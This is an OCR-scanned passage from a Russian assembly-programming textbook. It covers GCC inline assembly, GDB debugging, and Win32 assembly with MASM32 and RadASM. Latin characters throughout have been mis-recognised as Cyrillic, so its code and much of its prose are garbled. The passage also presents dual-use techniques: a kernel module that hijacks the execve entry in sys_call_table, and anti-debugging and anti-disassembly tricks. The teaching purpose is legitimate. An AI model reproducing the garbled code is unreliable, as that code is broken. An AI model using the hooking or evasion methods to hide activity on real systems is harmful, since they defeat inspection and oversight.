//на место передаваемой переменной у 


Это наглядный пример того, как происходит генерация кода. Компилятор 
не использовал регистр %еах. В качестве свободного регистра был выбран регистр %едх. 
Видно, что и хиу хранятся в одном регистре %едх. Если же используется множество 
операндов, то такой подход нежелателен, следует использовать несколько регистров, дабы 
не затереть случайно значение уже используемого регистра. Для этого следует заставить 
компилятор использовать разные регистры. Делается это при помоши операнда &: 
\0}:Я ма1пт()} 


{ 
11 х=10,у; 
азм ( “поу1 %1, %%еах\п 
оу] %%еах, +%0” 
и=ёг” (у} 
1" т” (Хх) 
“%еах” 
); 
} 





РР 
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В этом случае сгенерированный код выглядит иначе: 


па] п: 

раз] %еБр 

моУ] $езр, Зе бр 
5101 $8, Зезр 





ПОУ1 $10,-4 (%еЪр} // у=10 
МОУ1 -4(3%е5р},%есх // получаем передаваемое значение в %есх 
#АРР // начало азм 


МОУ 1 Фесх, Зеах // х передаем в %еах 


МОУ] %еах, %е4х /Г у - новое значение в %еах 

#МО_АРР // конец азм 

ЩОУ1 $ех, -8 (%еор} // новое значение помещается в стек 
// на место передаваемой переменной у 


Принудительное использование регистров. Ниже приведен пример, в котором мы 
принуждаем помещать выходные параметры в определенные регистры: 
аз (“сра1а” 
"=а” {_еах), 


“=5” (_еЪх), 
“=с” {_есх), 
“=” (_еах} 
:‘а” (ор} 


}; 


Команде сри!4 мы передаем в качестве операнда с переменную ор, значение 
которой помещается в регистр %еах, а возвращаемое значение получаем в регистрах 
%еах, %\ебх, %есх ‚, %\е4х, которые в свою очередь помещают значения 
в переменные _еах, ефх, есх, едх. | 

Сгенерированный код выглядит так: 

моу] -20 (%е5р),%еах // значение ор в регистр %еах 
#АРР 
сри1 а 
#№0_АРР 
оу] Феах,-4 (%еЪр) 
.поУ1 Ферх, -8 (%е5р} 
поу1 Фесх,-12 (%еЪр} 
поу]1 Зеах, -16 (%еЪр} 


Еще один пример: 
азм ( “с1а\п 


тер\п 
поузр” 
// выходных операндов нет 
“5” (5:С), “0” (938), “с” (соцпё) 


}; 
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|. 
Это пример функции гсру(). В качестве операндов используются С-переменны.. 
гс, указатель на которую хранится в регистре %ез, 451, указатель на которую хра. 
нится в регистре %ед1, и соип! — длина строки, хранящаяся в регистре %есх. 
Пример использования совпадений. Системный вызов с четырьмя параметрами: 













#аеЕ1пе _зузса114 {Еуре, паме, Куре! ,аг91, Е уре2, агу2, 1 
фуре3З, ахд3,Еуре4, агд4)} \ ЕЕ 

фуре паме (+уре1 аг91, +уре? агд2, Еуре3 агд3, &уреф агч94)} \ 

{ \ 

1019 __гез; \ 

_ азм__ \01а%11е ("1пе $0х80" \ 

"=а" (_ тез} \ у 
: "0" (_ МВ _##паще),"Ь" ((1оп9) {аг91)),"с" {(1019) (аг92}), \ 
"4" ((1019} (аг93)),"5" ((1019) (аг94))); \ 


__5узса11 гекигп ({уре, __хез); \ 


} 


Здесь четыре параметра хранятся в регистрах %еьх, %есх, %е4х, %ез1, так как м 
принуждаем ССС использовать эти регистры, используя описатели Б, с, 4 и $. Заметь 
что выходной параметр системного вызова, хранящийся в регистре %еах, передается ( 
переменной __ гез. Используя механизм совпадений, мы пишем описатель "0" для то 
чтобы заставить компилятор использовать регистр %еах для передачи номера системи. 
го вызова _ МК ###пате. В этом случае один регистр (%еах) используется как во вхо 
ном, так и в выходном операнде. Также заметьте, что входной операнд используете 
раньше, чем появляется выходной, хотя последний описан раньше. 

Это весьма полезный пример, так как при написании модуля ядра для перехвата си 
темного вызова ехесуе() мы не имеем никакой другой возможности сделать это без испол 
зования шПпе-ассемблера. 


// необходимые 1пс]а4е 


ехЕегп у0149* зу5_са11 баю1е[]; 
116 55 пем ехесуе; 


$ЕаЕ1с — 116 (*014_ехесуе)} (сопзЕе спаг *Ё1 | епапе, СОПЗЕ сва 
*агау [], 
. соп5е сраг *епур[] ); 
зСае1с 1пЕ пем_ехесуе (сопзЕ сраг *Ё11епаще, сопзЕ сВаг *агду[ 
сопзЕ спаг *епур|!] ); 
зЕае1с пе м 
пен о14 ехесуе (сопзЕ сваг *Ё1] епапе, СОП$Е сраг хату [], 
= = сопзЕ сраг *епур[] } 
( 
1опа гез; 
азм \о]1аЕ11е ("1пе $0х80":"=а" (гез) : "0" ({5У5 пем ехесуе), 
— "р" ((1опа) (Ё1]епаме)), = = 
"с" { (1019) (агду} }, "А" { {1019} (епур) }); 
гебиги (116) тез; 
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} 
11 
пен_ехесуе (сопзЕ спаг *Ё1]епапе, 


СОП$Е 
сопзЕ спахг *епур[] } 


сваг *аг 


{ 
ре1ПЕК (“ЕХЕСУЕ () \ п”); 
гебиЕп печ_о19_ехестуе (Е1]епаме, агау, епур); 


} 

11 

1116 _моац1е (10:4) 
5У5_пен_ехесуе = 255; 
019 ехесуе=зуз са11 _+аЪ1е[575$ ехесуе]; 
3уз_са11 саьр1е[5у5_пен_ ехесуе]=о1Я ехесуе; 
$у5_са11 Ка1е[ 55 ехесуе]=пеи ехебуе; 
тебигп 0; = = 

} 

уо1 а 

сТевпир_ подите (уо19) 


$уз_са11 Сар1е[5У5_ехесуе] =014_ехесуе; 


4.14. Отладка. Основы работы с СОВ 


В поставке с операционной системой Гллих идет отладчик СОВ (СМУ Оеби 
В сети Интернет достаточно много материалов, посвященных работе с этим отладч! 
да и полезной информации хватит на написание отдельной книги. Так что в этой 
будет изложена только основная часть, необходимая для работы с небольшими про 
мами, написанными не только на ассемблере, но и на языке С. 

Использование отладчика позволяет запускать и проверять работоспособность 
граммы в более контролируемой среде. Отладчик позволяет выполнять прогр 
по шагам, контролируя значения отдельно взятых переменных, тем самым, про! 
правильность хода выполнения программы. Позволяет изменять значения перемен 
пропускать некоторые строки кода или даже выполнение некоторых функций. Позв‹ 
отлаживать как отдельные программы, так и присоединяться к текущим проце 
Существует возможность загружать соге-файлы, файлы, которые генерируются сист 
при сбое программы, что позволяет определить если не точное, то приблизительно 
сто ошибки в программе. 

Здесь мы рассмотрим только несколько основных команд. Стоит отметить, что 
программный продукт, как и большинство программ под ОС пих, для своей ра 
использует командную строку. Если Вас не устраивает такой интерфейс пользова 
Существует версия с более дружелюбным интерфейсом — ххе4Ь. 














хх 
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Запуск программы. Для того чтобы отладник «понимал» названия переменных и мет, 
в теле программы, необходимо включить в программный модуль отладочные символы. Эт, 
выполняется при компиляции, если задан ключ -2. В противном случае отсутствует воз. 
можность контролировать значения переменных, так как виден только ассемблерный текст. 
В командной строке СОВ введите 


ргеаК па1п 


Эта команда поставит контрольную точку на входе функции па1 п, ЧТО ПОЗВОЛИТ про, 
пустить весь код до этой функции. Далее стоит ввести 


ТОП 


Для того чтобы начать работу с программой. Вы можете выполнять программы 
построчно, переходя от одной строке к другой, вводя в командной строке п. 

При нахождении в той точке программы, где вызывается какая-то функция, можно 
войти в нее, что позволит более детально проследить ее выполнение. Для этого сущест- 
вует команда з. 

Для того чтобы вернуться из функции, используйте команду :. 

Для изменение значения переменной или регистра используется команда зе. 

Для дизассемблирования секции или функции программы существует команда 4: заз. 

В выражениях вы можете обращаться к содержимому машинных регистров, обозна- 
чая их как переменные с именами, начинающимся с ‘$’. Вывести имена и содержимое 
всех регистров, кроме регистров с плавающей точкой (в выбранном кадре стека) можно 
следующим образом: 

11Ео гед15тетг$ 

Чтобы вывести имена и содержимое всех регистров, включая регистры с плавающе 
точкой, необходима команда 110 а11-гед1зеегз. 

Для вывода относительного значения каждого из указанных в Имя-рег регистре: 
(значения регистров обычно относятся к выбранному кадру стека; имя-рег может быт 
любым именем регистра, с `$' в начале имени или без): 


1пЕо гед1з%егз имя-рег 

Ниже приведен пример программы, которую мы будем отлаживать. 
#1пс1а9е <зЕ41о.1> 

116 

рг1пЕ10е (116 пишет} 

{ 

рЕ1пЕЁ(“Неге 1$ %Бе попег: %4" , пашет}; 

гесагп пипьег; 


} 


\014 
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ва:зт (} 

{ 

11 1; 

ре1ПЕЕ (“боо49-могК1па ргодгат\п”); 
ри1 110 (1); 

} 


По замыслу эта программа должна увеличить значение переменной : до пяти и пере- 
дать ее в функцию ру1пе1 пе () ‚ которая выведет ее на экран. 
Компилируем и запускаем программу: 


$ 94сс -9 -0 ргод ргод.с 

$ „/ргод 

бооа-могк1пд ргодгам 

Неге 15 Не пипЬег: -5324 


Проблема. Программа не совсем «Соод-мотг». Вместо 5 мы получили совсем дру- 


гое число, да еще и отрицательное. В чем же проблема? Стоит посмотреть на программу 
под микроскопом. 


$ чаь ргод 
СОВ 15 шу Гахог1Е Чераадег! 


Это приглашение отладчика. Оно может отличаться из-за персональных настроек и но- 
мера версии. После приветствия мы попадаем в командный интерпретатор отладчика. 
(345) ргеах мат 
ВгеаКро1т* 1 аЁ 0х1 60Е 
Устанавливаем контрольную точку на функцию та!т. 


({Ч95) гип 
ЗтагЕ1па ргодгам 


ВгеакКро!1 пе 1, мафп() 


Запускаем программу. Программа выполняется до тех пор, пока не встретится первая 


Ко 
нтрольная точка. В нашем случае выполнение программы останавливается на входе 
функции паз (}. 


(346) п 
бооЯ-ногк119 ргодгам 


а ИЧИНаем построчное выполнение программы. Появилось сообщение, вывод про- 
МЫ. 
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(945) $ 
ре1пЕ1 ПЕ (пимрег=-5324) 


Входим в функцию рилип®). При этом отладчик показывает стек, передаваемый 
функции. Мы видим, что значение, передаваемое в стеке, не соответствует 5. Начинаем 
разбираться. 


(945) пр 
#1 0х1625 


Возвращаемся на шаг назад до выполнение функции. 


(996) р1 
$1 = -5324 
Проверяем значение переменной 1. Как видим, мы забыли инициализировать эту пе- 
ременную. Так что нужно вернуться в программу и дописать до вызова функции 
ре1п 1 (}, 1=5. . 
Заметьте, что при вызове функции, при выходе из нее или даже при использовании 
команд ир и до\п отладчик всегда показывает окно стека: название функции и значения 
аргументов, передаваемых ей. 
Исследование соге файлов. Соге файл — файл, содержащий в себе полное описание 
процесса при аварийном завершении программы. 
Для анализа такого файла необходимо запустить отладчик и, не устанавливая кон- 
трольных точек и не запуская программы, ввести команду (246) соге ргор.соге. 
Если вы находитесь в том каталоге, что и сам соге файл, то вы увидите что-то вроде этого: 


Соге наз депегаееЯ Ъу ‘а.оч*’ 

Ргодгаш тегш1паееЯ м1ЕВ 319па1 11, бедтепЕа*1о1п Гац1*. 
СаппоЕ ассезз шещогу ак аЧ9Яхезз 0х70207964 

#0 0х164а 1п Ёоо(1=0х5} 

{9аь) 


В данном случае программа завершилась неудачно при попытке доступа к недоступной 
ей области памяти. Порой достаточно полезно посмотреть, как была вызвана функция, так 


как проблема могла возникнуть еще до начала работы функции. 
Команда 5! позволяет распечатать Баск-гасе стека вызовов. 


(чаь} ве 

#0 0х164а 1п Еоо(1=0х5} 
#1 ОхеЕьЕЯ888 1п епа () 
#2 0х162с 1п ма1п() 


{ чар) 
Функция еп4() вызывается в тот момент, когда рушится программа. Функция {000 
была вызвана из функции таш(). 
Подключение к выполняющемуся процессу. Основным достоинством отладчика 608 
является возможность подключатся к процессам и отлаживать их во время выполнений. 
Для этого необходимы достаточные права доступа и одно условие, которое впоследств"" 
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можно использовать как антиотладочное средство, — на отлаживаемом процессе не 
ь 

жен быть установлен флаг ргасе. Другими словами, к одному процессу однов 

нельзя подключать несколько отладчиков. рем 


тй 
Данный способ можно использовать для защиты от отладки и/или проверки нал 
отладочных средств, но об этом мы поговорим позднее 


так, для п 
Итак, для подключения к процессу используется команда анась р, где р!4 — 
фикатор запущенного процесса. ие 
ь, п 
Есть | рава, еще один минус — невозможность отладки дочерних процессов Д 
т , ри использовании системного вызова К() создается дочерний проц 
ндеати д катор которого отличается от родительского. В этом случае мы его теряем 
м то что ы отключится от процесса, нам нужно выполнить команду де{ась | 
щЩ т отладки и дизассемблирования. Рассмотрим несколько прость 
защиты от исследования. Роотих мтс 
ейственный 
, Д е ый прием защиты от отладки процесса — установка флага расе нан 
примеру, чтобы проверить, запущен ли отладчик, нуж 
вот такой код: 
т Е 
1Е (рЕгасе(РТВАСЕ ТВАСЕМЕ, 0, 1, 0} < 0} тефиахкп 1; 
О 


той _ нтр 
в Груго? способ это проверка на установленные ко Вольные точки. Как извес? 
нтр я точка — это прерывание по номеру 3. Вот ее мы и будем проверять: 
1 х + + | 
{ {* (уо1а& 1 1е 9151 апе4 *) ((ипз1дпеа)} Еоо + 
& ОхЕЕ) == Охсс) геё 
цгп 1; 
яз | 
гр адиты от дизассемолирования можно осуществлять переход в какую-то то 
аким образом, чтобы дельта не была кратна длине команды. Дизассембле 


но в теле программы помест 


отличающи 


пр апе1Черич1 + 2 


ап 1Зефиа1: 
роге 0хс606 
са 
ге]ос: тет ос 
рор1 $е$1 
Эпр апе1аеь 
ап аеьаа»: 492 
аа91 $ (Чака - хе1ос),%е51 
МОУ 1 0 (%е51) , %е491 
ризЬ]1 %е$} 


]пр *%е41 
Заза: тр ест 


„Толпа 0 











Глава 5 


Программирование 
на Ассемблере под \ш9о0%$ 


Программирование на ассемблере под \!132 воспринимается весьма неоднозначно 
Считается, что написание приложений слишком сложно для его применения. Собственно, 
обсуждению того, насколько оправдана такая точка зрения, и посвящена данная глава. Она 
не ставит своей целью обучение программированию под \!1132 или обучение ассемблеру: 
подразумевается, что читатели уже получили определенные знания в этих областях. 

В отличие от программирования под РОЗ, где программы, написанные на языках 
высокого уровня, были мало похожи на свои аналоги, написанные на ассемблере, при- 
ложения под \!!132 имеют гораздо больше общего. В первую очередь, это связано с тем, 
что обращение к системным сервисам операционной системы в ао осуществляет 
посредством вызовов функций (подпрограмм), а не прерываний, что ло р т р Ю 
для 2О$. Здесь нет передачи параметров в регистрах процессора при © ращении ис- 
темным вызовам и, соответственно, нет множества результирующих значений возвра- 
щаемых опять же в регистрах общего назначения и регистре флагов. Следовательно, 
проще помнить и использовать правила взаимодействия с ОС. Но с другой стороны, 
в \! 1132 нельзя непосредственно работать с аппаратными ресурсами, чем претит 
программы для 2О$, произвольно адресовать любые участки оперативной памяти ит. д, 
что является следствием работы процессора в защищенном режиме. и 

В современных инструментах ассемблирования развиваются возможности, котор 

‚ К таким средствам можно 
ранее были характерны только для языков высокого уровня. К ри 
отнести: макроопределения вызовов процедур, возможности введения их ие, 
{описание прототипов) и даже объектно-ориентированные расширения. Однако ас 
лер сохранил и такой прекрасный механизм, как макроопределения, вводимые 
телем, полноценного аналога которому нет ни в одном языке высокого уровня. нс 

Все эти факторы позволяют рассматривать ассемблер как НЫ 
мент для написания приложений под платформы \132 (\Ут4о\$ 
и \пдомвз 9х/МЕ). 


5.1. Выбор инструментария 


баты” 
На сегодняшний день доступно достаточно много средств, позволяющих а 
вать приложения под \!тдо\з на языке ассемблер. Однако, на взгляд автора, и опр оса. 
В 
дение в рамках одной главы книги неминуемо увело бы в сторону от основного 
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Поэтому ниже приводится лишь список доступных трансляторов и интегрированнь 
сред разработки, а внимание будет сосредоточено лишь на том инструментарии, кот 
рым пользовался автор при подготовке материала, хотя окончательный выбор, 
венно, остается за читателем. | 

Итак, что же нам предлагают поставщики средств разработки для программировани 
на ассемблере под \тдо\м5. Существует несколько пакетов. Основными ЯВЛЯЮТС 
Мисгозой МАЗМ 6.1х или 7.0, Войапд ТАЗМ 5.0х, МАЗМ, ЕАЗМ и еще несколько мене 
известных разработок. Как Вы уже наверно заметили, ТАЗМ и МА5М разработаны соф 
тверными гигантами Войап4 и Мгсгозой, они в основном предназначены для создани 
программ для М5-2О$ и \Ишдо\мз. Другие пакеты обладают своими уникальными осо 
бенностями: для программирования под «ассемблерной» ОС Мепие! используется ЕАЗМ 
пакет МАЗМ разработан как бесплатная альтернатива ТАЗМ и МАЗМ, но, кроме этогс 
содержит определенные расширения синтаксисе. 

Обычно пакет ассемблера состоит из транслятора исходного текста в объектный код 
компилятора ресурсов и компоновщика. Именно от компоновщика (ГлпКег} и зависит 
под какой ОС будет работать результирующая программа. Для создания и последующег 
редактирования файлов исходного кода применяются различные текстовые редакторы 
После завершения редактирования файл исходного кода передается на трансляцин 
ассемблеру, а затем результат ассемблирования обрабатывается линковщиком (компо 
новщиком) для получения исполняемого модуля. Эти шаги выполняются последователь 
но, друг за другом, вызовами соответствующих инструментов из пакета ассемблера. 

Однако существуют специализированные интегрированные системы разработки, авто 
матизирующие этот процесс. Кроме, непосредственно, автоматического получения испол 
няемого модуля, подобные системы обладают рядом полезных свойств, таких, как настраи 
ваемая подсветка синтаксиса (удобный выбор цветов синтаксических элементов) 
автоподсказка и автозавершение при вводе исходного текста, поддержка различных паке. 
тов ассемблера, возможность свертки процедур и других блочных конструкций при нави: 
‘ации по исходному коду (соПарзт?), редактирование ресурсов. Вот некоторые из извест. 
чых интегрированных сред разработки, поддерживающие разработку программ на языке 
ассемблер: КааА$М, \!ТАЗМ, Мераюгу АззетЫ у Знаю, У4виа] ЗИсКЕАИ, Зошгсе шее. 

Для дальнейшего обсуждения вопросов программирования для \/тдо\з из этогс 
многообразия инструментов выберем свободно распространяемые в сети ИНТЕРНЕТ 
Пакет ассемблера МАЗМЗ2 и среду быстрой разработки программ КадАЗМ. На мо- 
мент написания книги это были, соответственно, версии 8.0 и 2.0.3.8. Ни в коем случае 
автор не навязывает читателю свое мнение, и сам выбор не претендует на абсолют — 
ЭТо лишь одни из многих достойных продуктов. 

МА$М32 (ПЕр:/Луум пазт32.сот/). Автор — Зеуе НикрВеззоп. Программный ком- 

Лекс МАЗМЗ2 представляет собой набор следующих компонентов: свободно распро- 

СТраняемый транслятор с языка ассемблер М1сгозой МАЗМ 6.14, набор специализиро- 

занных утилит, простейший редактор исходных текстов и, что является самым ценным 


естес 





Аа | 
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для начинающего программиста под \пдо\з, громадное количество примеров и доку. 
ментации к ним, средства поддержки системных вызовов \/ш40\5. 

ВадАЗМ (Вар://тадазтм1зна!аззетег.сот/). Автор — Кей! О[беп. Этот продукт сделан 
программистом на ассемблере для программистов на ассемблере. Кроме того, сам проект 
полностью написан на ассемблере. Здесь мы имеем быструю, небольшую по объем, 
и бесплатную интегрированную оболочку, поддерживающую работу с солидным спи. 
ском трансляторов (в том числе и МАЗМЗ32) и написанную энтузиастом для таких же 
энтузиастов, обладающую достаточной функциональностью разработки для малых 
и средних проектов. 


5.2. Начало работы 


После успешной установки выбранных программных средств и запуска среды 
ВадА$М она автоматически будет сконфигурирована на использование МАЗМЗ32 (далее 
предполагается, что МАЗМ32 установлен в САЛМА$МЗ2, а Вад АЗМ в САВааА$М). 

С легкой руки Дениса Ричи повелось начинать освоение программирования в какой. 
либо новой среде с создания простейшей программы "Нео, \!оп а". Не будем рушить 
традицию и добавим еще один "НеПо, \/ о!" в его копилку. 

Центральное понятие при разработке в КадАЗМ - проект. Проект содержит перечень 
всех исходных файлов (тексты на языке ассемблер, файлы ресурсов, файлы описания 
диалоговых окон), правил и команд, необходимых лля их трансляции и сборки в готовое 
приложение. ВадАЗМ использует свой собственный формат представления ресурсов 


. диалогов и таблиц строк, но в момент сборки приложения создаются стандартные ‚ге 


и тс модули для передачи компилятору ресурсов из пакета МАЗМ?2. 

Проект размещается в своей собственной директории {в настройках КаёАЗМ можно 
указать место размещения по умолчанию для вновь создаваемых проектов), имея при 
этом произвольное число вложенных поддиректорий. Рекомендуется наличие директо- 
рии КЕ$З, которая используется для хранения „гс файлов ресурсов и ВАК, которая содер" 
жит резервные копии (фасКир5) файлов, создаваемых КадА$М каждый раз, когда проис- 
ходит запись их обновленных (исправленных) версий на диск. В корневой директорий 
проекта размещаются как минимум файл описания проекта ‚гар и файл на языке ассемб- 
лер, имеющий ссылки на остальные файлы исходного кода, подключаемые транслятором 
при ассемблировании. 

Итак, после запуска среды ВадА$М выбираем в меню ЕйЙе пункт Меми РгоесЕ и в сле” 
дующем окне задаем тип создаваемого нами проекта, как показано на рис. 5.2.1. 


Первый лист мастера создания нового проекта позволяет выбирать тип транслятор 
с помощью которого будет вестись разработка программ. По умолчанию это МАЗМ (нас 
это устраивает). Как видно из рисунка, мастер проектов позволяет создавать готовые 
окружения для разработки различных типов приложений. 


-лава 5. Программирование на ассемблере под МУИп4о\миз 





| тон воруиоя 


























СС 
ы. Аззвтье | 
Ш тазт ы 
р" Я РоесЕ Туре — р 
© 4 (миа Арр О 00зАрр 
С сс с 
м <} Сопзое Арр <} 0$ Арр [сот] ' 
О! <} ОИРае | 
Я ь -4 Ё С) ЦВ Рюес! | 
с В. СЪММАКЕ Ра | 
в у я 
Риовс{ Мате: На \/ои9 
| Рес Оезсирноп — Тне Нео \ои4 аррйсаной | 
| . 
| Реоес!з Рофег С *Р адАзт\М азтАРгоес [И 
| т 
| егир!а!е: . 
ИИ 
| 
Ё Далее > | Отмена 











Рис. 5.2.1. Мастер проектов -— тип и имя 


№1132 Арр - 
Сопзо1е Арр - 
211 Рго]есе - 
Ь1В Рго]есё - 
ММАКЕ Рго]есе - 
№1132 Арр (по гез}) - 
Роз Арр - 
Роз Арр ({.соп) - 


Оконное приложение И1па0ч5 

Консольное приложение И1п4ом$ 
Динамически связываемая библиотека ИМ1пдо 
Статически связываемая библиотека И!1пта‹ 
Проект, собираемый утилитой ММАКЕ 
Приложение М1п4оч$ без встроенных ресурс 
Приложение 005 в формате ехе 
Приложение 0205 в формате сом 


Далее необходимо задать название проекта (Рго}есё Мате), оно также будет им‹ 
папки проекта, и его описание (Рго]есё РезсирИоп). Описание проекта — это надг 
которая отображается в заголовке окна проекта при его открытии в КадА$М. Здесь 
же можно изменить путь, по которому будет располагаться папка проекта (Ри 
Ро]4ег), и выбрать шаблон (Тегар!ае) из палки шаблонов. 

Шаблон — вспомогательный инструмент, который разрабатывается для автоматиз 
процесса создания приложений и реализующий концепции быстрой разработки (ВАР — Е 
Аррйсаноп Реуеортеп®). При создании нового проекта вы можете выбрать один из гот 
шаблонных сценариев. Шаблонный сценарий — нечто большее, чем просто включение за! 
вок ‚аз файлов в новый проект, он может установить любые опции гар файла (файла с: 
Чия проекта), подключить внешние бинарные данные и создать все необходимые исхо, 
и для вашей программы. Шаблоны очень полезны при создании множества проп 

отипным начальным каркасом ресурсов и стартового кода, 
оные сценарии могут быть созданы средствами ВадА$М, однако этот во 
т за рамки обсуждаемой в данной главе темы. 
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Ёп. С целью скорейшего получения работоспособной программы "НеНо \ ой" по, мультимедиа файлы АУ], МИЛ, \ЛУЕ, таблицы строк, меню, диалоги, панели инстру- 

| \УИп4ом, выберем в окне "Рго}есё \йгаг4 — Туре & Мате" вид окружения \! 1132 Арр (по ментов, информация о версии, «сырые данные». 

|| гез). Для создания полноценного "диалогового" приложения следует выбирать \\ 32 - Выбрав опцию Мод секции Ео]дег Сгеайоп, Вы в директории проекта создадите папку 
Арр. После присвоения нашему проекту имени "Не|о \ог14", а его описанию строки | МОР для подпроектов впоследствии, чтобы разбить большой проект на меньшие, для 
"Тре НеЦо \!о!6 аррисаноп", нажимаем кнопку "Далее" (Мех(). лучшей управляемости. Если Вы хотите создать ВАК папку резервных копий, выберите 

| В следующем окне (рис. 5.2.2) можно задать перечень файлов и подиректорий, кот. | — вокне Рго]ес! \/заг4 опцию Вак. 

| рые будут созданы в корневой директории нашего проекта. Для создания приложения "Нео \оП4" сделайте выбор. как показано на рис. 5.2. 2 





инажмите кнопку "Далее" (Мех). 

Последний лист свойств (рис. 5.2.3) мастера новых проектов, возможно, самый важный. 
В нем настраиваются перечень, сами команды трансляции и сборки проекта, которые будут 
доступны в меню Маке среды КадАЗМ (предлагаемые по умолчанию команды не требуют 
| ' изменений для большинства возможных проектов). Однако, если предполагается использо- 
| вание ресурсов, удостоверьтесь, что строка команды К заканчивается на ",4", иначе про- 
трамма редактор связей не сможет работать с вашим ресурсным файлом. Главным образом 
это касается сборки динамически связываемых библиотек ОГ, содержащих ресурсы. 
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Рис. 5.2.2. Мастер проектов — Файль! и чиректории 
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В секции ЕЦе СтеаНоп пометьте, файлы каких типов Вам понадобятся: в проект будут 
добавлены новые файлы с именами Вашего проекта и соответствующими расширениями. 

В секции Ео!4ег Сгеайоп, если Вы собираетесь использовать ресурсы, Вам поналобится 
папка ВЕЗ, и чтобы ее создать, достаточно выбрать опцию Кез. Ресурсы — "некодовая" сек- 
ция, добавляемая в образ приложения в момент его сборки и доступная во время выполне- 
ния. Она позволяет включать фактически любые двоичные данные в исполняемый или РЁ. 
файл. Добавление ресурсов в проект происходит посредством редактирования сценария 
определения ресурсов, имеющего расширение „гс и компилируемого в .гез файл компиля- 
тором ресурсов (обычно ВС.ЕХЕ из пакета конкретного транслятора) и подключаемого 
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Рис. 5.2.3. Мастер проектов -— Настройка меню Маке 


Оставляем все как есть и нажимаем на кнопку "Далее" (Мех!). 


:В ы коез му мо олняемого файла проекта В результате работы мастера новых проектов мы получили настроенную для создани; 
| актором связей к ЛЬТИ м лю исполняя! . а 
И. редактор резу рующему моду р к и сборки нашего проекта среду Вад АЗМ и пустой файл исходного кода Нео \МоН9.азт 
ю ВадАЗМ позволяет создавать ресурсы, управлять их компиляцией и связыванием т8 Двой о .. 
|. .. и е ойным щелчком мыши откройте его для редактирования и наберите следующий текс 
. же, как и файлами исходного кода. Основной файл ресурсов отображается в браузер . 


.. на языке ассемблер. 
проекта и может быть отредактирован вручную. КадА$М создает отдельные ВС файлы р 


для каждого типа ресурсов, эти файлы размещаются в папке /ВЕ$ проекта. Перечислим 
ресурсы, поддерживаемые средой КадАЗМ: изображения Бр, 21, ]ре, курсоры, иконки. 
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5.3. Программа «Нео У\Уо д» 


Текст программы "НеПо \\Мо!14" на языке ассемблер: 


.386 

.МОРЕЬ Е1аё, $&4са11 

орЕ1оп саземар: попе 

1пс1а4е \пазш32\1пс 1 иде \ м1 п9омз.1пс 
1пс1а4е \пазш32\1пс1а4е\ Кегпе1 32. 1пс 
11с109е11Ъ Кегпе132.115 

1пс1а9е \пази32\1пс1аде\пзет32. 1пс 
11с109е116 цзег32.11 


‚ СОП5Е 

М59Сарс1 оп Яр "ТНне Не11о Мог1Я арр11са®1пт",0 
МэаВохТтехе ЧаЬ "Не11о Мог1а!",0 

. соде 

зкагЕ: 


1пуоке МеззадеВох, МОГ, а4ааг МзчВохТехе, а44г МзаСарЕ1оп, МВ ОК 
1пуоке Ех! Ргосез$, МОБЬ 
епа зкахе 
После правильного набора текста программы выберите пункт Кип меню Маке для е 
запуска на выполнение. В результате на экране появится окно (рис. 5.3.1), в случае не- 
удачи следует проверить правильность ввода текста. 











Рис. 5.3.1. Результат работы! программы Нео \\/опЧ 


\!1132 программы выполняются в защищенном режиме, который "в полном объеме" ста 
доступен начиная с 80386. Каждую \132 программу \/тдо\$ запускает в отдельно! 
виртуальном пространстве размером в 4 гигабайта, но это вовсе не означает, что 4 гигабайт 
физической памяти будут доступны, а всего лишь то, что \/ 132 программа может обращаться 
по любому адресу в этих пределах (на самом деле и это не совсем так, но близко). 

\пдо\$ делает все необходимое, чтобы память, к которой программа обращается. 
была "существующей". Конечно, программа должна придерживаться определенных 
правил, установленных \/140\$, иначе может произойти сбой защиты "Сепега! 
Ргоесноп Раш". . 

В рамках такой организации мы больше не должны беспокоиться о моделях памяти ил" 
сегментах. При программировании под \/шдо\з применяется только одна модель — плс” 
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ская (ЕГАТ - большое последовательное 4 гигабайтовое адресное пространство). Это т 
означает, что работа с сегментными регистрами максимально упростилась и мо 
использовать любой из них для адресации ячеек памяти по всему пространству адресов. 

При программировании под \/1132 необходимо помнить следующее: \Уша 
использует езЪ, е@1, ебр и еБх для своих целей и ожидает корректной работы програм 
по сохранению их значений. Если же вы используете какой-либо из этих четы 
регистров между вызовами системных функций, то не забывайте сохранять и восстат 
ливать их значения в процессе работы. 

Обычно при разработке программ на любом языке программирования всегда суще 
вуют правила, по которым оформляется файл исходного кода. Ассемблер для \М/та 
не является исключением. Ниже приводится шаблон, который можно всегда исполь 
вать при написании новой программы. 

. 386 


„.МОРЕЬ Е1ае, 5ТОСАБЬ 
‚ВАТА 


; <Инициализированные данные> 


; <Код> 
епЯ <метка> 


‚386 — это директива ассемблера, указывающая на использование при трансляции м 
моник операций из набора команд процессора 80386. Можно также использовать .486.. 
ит. д, но наиболее общим является выбор именно .386. Доступны два набора инструк 
для каждого типа процессора: .3 86/.386р, .486/.486р и т. д. Версии с буквой "р" необходи 
8 случае, если разрабатываемая программа использует привелегированные инструкг 
защишенного режима. Они могут потребоваться только в "защищенном" коде, наприм 
При разработке драйвера ядра или системной службы. 


.МОРЕЬ ЕЪАТ, 5ТОСАБЬ 


МОРЕ, — это ассемблерная директива, определяющая модель памяти Ван 
мы Как было уже сказано, в \/ 132 существует только одна модель — плось 
. Директива ЗТОСА устанавливает правила передачи параметров через с1 

При вызове подпрограмм (функций), а также код, ответственный за его очистку по. 
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вершении вызова. Исторически, со времен \т16 унаследованы два соглашения 
о передаче параметров: С и РАЗСАЕ. 

По С-соглашению, параметры передаются справа налево, т. е. самый правый 
параметр кладется в стек первым. Вызывающий код должен очищать стек после вызова. 
Например, при вызове программой функции с именем Гоо (Йг${ рагат, зесоп4_рагат, 
фи4_рагат), используя соглашение С, результат трансляции будет выглядеть так: 


разн [&51.4_ рагам] ; Поместить в стек третий параметр 

разн [зесоп4_рагаш] ; затем второй параметр 

разн [Е1к3е рагам] ; и, наконец, первый 

Са11 Еоо 

а49 эр, 12 ; Вызывающий код производит очистку стека 


РАЗСАГ — передача параметров обратна С-передаче. Согласно ей, параметры 
передаются слева направо и вызываемая функция должна производить очистку стека. 

\! 116 использует такой порядок передачи с целью сокращения размера вызывающе. 
го кода (отпадает необходимость ‘очистки стека после каждого вызова). С-соглашение 
удобно в случае вызовов функций с переменным числом параметров. 

$ТЬСАШ, - это гибрид С и РАЗСАГ. Согласно ему, данные передаются справа нале- 
во, но вызываемая фукнкция ответственна за очистку стека. Платформа \!1132 использу- 
ет исключительно $ЗТРСАШ,, за исключением уизрии (в данном случае необходимо 
следовать соглашению вызовов С). 


.ВАТА 
.РАТА? 
. СОМ5Т 


